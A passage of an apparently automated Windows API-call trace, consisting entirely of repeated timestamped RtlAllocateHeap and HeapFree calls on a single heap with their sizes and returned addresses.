dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 